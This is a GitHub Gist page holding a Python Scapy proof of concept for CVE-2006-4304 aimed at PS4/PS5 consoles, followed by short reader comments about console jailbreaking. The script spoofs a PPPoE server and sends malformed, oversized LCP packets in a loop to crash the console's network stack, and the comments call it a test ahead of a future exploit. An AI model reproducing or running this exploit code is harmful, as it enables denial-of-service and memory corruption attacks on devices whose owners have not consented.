Created
January 30, 2024 16:02
-
-
Save RobbedColek/8b0bc9655adc6ad9564ad71453188e37 to your computer and use it in GitHub Desktop.
PoC of CVE-2006-4304 for PS4/PS5
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump | |
source = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of your adapter on PC | |
destination = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of LAN on your PS4 | |
interface = "Realtek PCIe 2.5GbE Family Controller #2" # get via "ipconfig /all" or eth0 or similiar on Linux | |
packet = sniff(iface=interface, filter="pppoed", count=1) | |
tag_value = packet[PPPoED][0].tag_list[1].tag_value | |
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value | |
sendp(payload, iface=interface) | |
packet = sniff(iface=interface, filter="pppoed", count=1) | |
payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value | |
sendp(payload, iface=interface) | |
packet = sniff(iface=interface, filter="pppoes", count=1) | |
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" | |
packet = srp1(Ether(payload), iface=interface) | |
print(hexdump(packet)) | |
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256 # this number might be different, just a guess | |
for i in range(20): | |
sendp(payload, iface=interface) |
I actually don't know but I if it is .02 it's a small change so I don't think is the error patch, but I'm not truly sure, so the best thing you can guys do is test this script, if it crashes your console, the future exploit should work too.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Sorry that I didn't know more about jailbreaking stuff, in the past, I used 9.00 for my PS4 Slim version and after a long long time I got one more chance to use Jailbreak, and hopefully TheFlow says 8.20 which includes all the versions